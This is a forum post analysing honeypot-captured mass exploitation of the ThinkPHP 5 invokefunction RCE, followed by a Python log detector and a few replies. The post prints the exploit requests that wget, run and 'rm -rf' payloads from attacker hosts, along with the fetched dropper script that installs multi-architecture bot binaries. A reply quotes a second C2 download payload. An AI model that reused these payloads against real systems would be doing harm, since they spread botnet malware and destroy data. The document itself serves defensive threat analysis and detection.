Honeypot-captured web application exploitation, analysis requested
Mass exploitation of the ThinkPHP5 RCE vulnerability
Anonymous user 2018-12-22 22:03:09 829 views

Attack captured by the honeypot

212.237.14.55 - - [22/Dec/2018:13:17:50 +0800] "GET /public/index.php?s=/index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://142.93.197.215/sh;%20chmod%20777%20sh;%20./sh;%20rm%20-rf%20* HTTP/1.1" 404 162 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.23.1.el6.x86_64"

212.237.14.55 - - [22/Dec/2018:17:59:48 +0800] "GET /public/index.php?s=/index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://142.93.197.215/php;chmod%20777%20php;./php;rm%20-rf%20* HTTP/1.1" 404 162 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.23.1.el6.x86_64"


Files fetched from the remote server via the RCE:

http://142.93.197.215/php

binarys="mips mpsl arm arm5 arm6 arm7 sh4 ppc x86 arc"
server_ip="142.93.197.215"
binname="Loliv3"
execname="LoliSecHoe"
for arch in $binarys
do
cd /tmp
wget http://$server_ip/$binname.$arch -O $execname
chmod 777 $execname
./$execname Think.php
rm -rf $execname
done

Written to disk and executed:

Loliv3.arc

Loliv3.arm

Loliv3.arm5

Loliv3.arm6

Loliv3.arm7

Loliv3.mips

Loliv3.mpsl

Loliv3.ppc

Loliv3.sh4

Loliv3.x86

php

Connects with Think.php

Threat indicators (IOC)
IP addresses (2)
Hash (1)
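The two captured requests above use the ThinkPHP 5.x `s=/index/\think\app/invokefunction` route with `call_user_func_array` so that `vars[0]` names the PHP callable and `vars[1][]` carries its arguments. Note the `%09hink%07pp` in the logged URL: the attacker wrote `"\think\app"` in a Python string, so `\t` and `\a` became TAB and BEL before URL-encoding. The following detector is an added example (not code from the original post): it parses access-log lines, undoes that mangling (and the `\x5C` backslash escaping that nginx uses in its logs, as in the comment below), and extracts the shell command and download URLs as IOCs. The sample log lines are constructed from the ones in the thread; the assumption that the client address is the last IPv4 before the quoted request holds for combined format but is only a guess for custom formats.

```python
"""Flag ThinkPHP 5.x ``invokefunction`` RCE attempts in web access logs.

Added example, not code from the original post. It parses access-log lines,
normalises the mangled controller path seen in the captures (``%09hink%07pp``:
the attacker's ``"\\think\\app"`` became TAB/BEL in a Python string, and nginx
writes backslashes as ``\\x5C``), and pulls the shell command and download URLs
out of ``vars[1][]`` as IOCs. The sample lines are constructed from the ones
in the thread; the client-IP field position for custom log formats is assumed.
"""
import re
from urllib.parse import unquote

# PHP callables that run OS commands when reached through call_user_func_array.
DANGEROUS_CALLABLES = {"system", "shell_exec", "exec", "passthru", "popen", "proc_open"}

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>[^" ]+) HTTP/[\d.]+"')
IPV4_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
URL_RE = re.compile(r"""https?://[^\s;|&'"<>]+""")


def parse_query(query):
    """Split a query string on '&' only, keeping repeated keys in order.

    parse_qs on older Pythons also splits on ';', which would chop the
    attacker's 'wget ...; chmod ...; ./sh' command into separate keys.
    """
    params = {}
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            params.setdefault(unquote(key), []).append(unquote(value))
    return params


def normalize_route(route):
    """Restore the intended '\\think\\app' controller path from mangled forms."""
    route = route.replace("\\x5C", "\\")   # nginx log escaping of a backslash
    route = route.replace("\t", "\\t")     # %09: "\t" eaten by a Python string
    route = route.replace("\a", "\\a")     # %07: "\a" likewise
    return route


def analyze_request(target):
    """Return a finding dict for a ThinkPHP invokefunction RCE attempt, else None."""
    params = parse_query(target.partition("?")[2])
    route = normalize_route(params.get("s", [""])[0])
    low = route.lower()
    if "\\think\\" not in low or not low.endswith("/invokefunction"):
        return None
    callable_ = params.get("vars[0]", [""])[0]
    # vars[1][] is the argument list ThinkPHP hands to the callable.
    command = " ".join(params.get("vars[1][]", []))
    return {
        "route": route,
        "function": params.get("function", [""])[0],
        "callable": callable_,
        "command": command,
        "urls": URL_RE.findall(command),
        "severity": "critical" if callable_ in DANGEROUS_CALLABLES else "suspicious",
    }


def scan_log(lines):
    """Return [(client_ip, finding), ...] for every RCE attempt in the log lines.

    The client IP is the last IPv4 address before the quoted request line:
    exact for Apache/nginx combined format, an assumption for custom formats.
    """
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        finding = analyze_request(m.group("target"))
        if finding is None:
            continue
        ips = IPV4_RE.findall(line[: m.start()])
        findings.append((ips[-1] if ips else None, finding))
    return findings


# Constructed sample lines, modelled on the captures in the post and the comment.
SAMPLE_LOG = [
    r'212.237.14.55 - - [22/Dec/2018:13:17:50 +0800] "GET /public/index.php?s=/index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://142.93.197.215/sh;%20chmod%20777%20sh;%20./sh;%20rm%20-rf%20* HTTP/1.1" 404 162 "-" "python-requests/2.6.0"',
    r'10.0.0.5 - - [22/Dec/2018:13:20:00 +0800] "GET /public/index.php?s=/index/index/index HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    r'2018-12-23T23:33:34+08:00 127.0.0.1 196.218.16.66 "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://cnc.junoland.xyz/bins/egg.x86;cat%20egg.x86%20>%20lzrd;chmod%20777%20lzrd;./lzrd%20thinkphp.x86 HTTP/1.1" - "-" "Sefa" 0.000',
]

if __name__ == "__main__":
    for ip, f in scan_log(SAMPLE_LOG):
        print(f"{ip} {f['severity']} {f['callable']}: {f['command']}  IOCs={f['urls']}")
```

Matching on the normalised route rather than on the literal `\think\app` string is what makes the detector catch the TAB/BEL and `\x5C` forms with one rule; it also flags other `\think\...` namespaces used with `invokefunction`, and callables outside `DANGEROUS_CALLABLES` (reconnaissance such as `phpinfo`) are still reported, just at lower severity.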
Anonymous user 2019-01-13 23:16:44 Reply
Nothing wrong with it, they're just way too fast
golbin 2018-12-28 16:11:38 Reply
Thanks for sharing
Anonymous user 2018-12-24 17:09:29 Reply
nginx log: 2018-12-23T23:33:34+08:00 127.0.0.1 196.218.16.66 "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://cnc.junoland.xyz/bins/egg.x86;cat%20egg.x86%20>%20lzrd;chmod%20777%20lzrd;./lzrd%20thinkphp.x86 HTTP/1.1" - "-" "Sefa" 0.000
ping cnc.junoland.xyz
PING cnc.junoland.xyz (194.36.173.103) 56(84) bytes of data
Not sure whether it's the same crew
Anonymous user 2018-12-24 19:07:31 Reply
Thanks for sharing
Anonymous user 2018-12-23 15:22:25 Reply
The hackers are really fast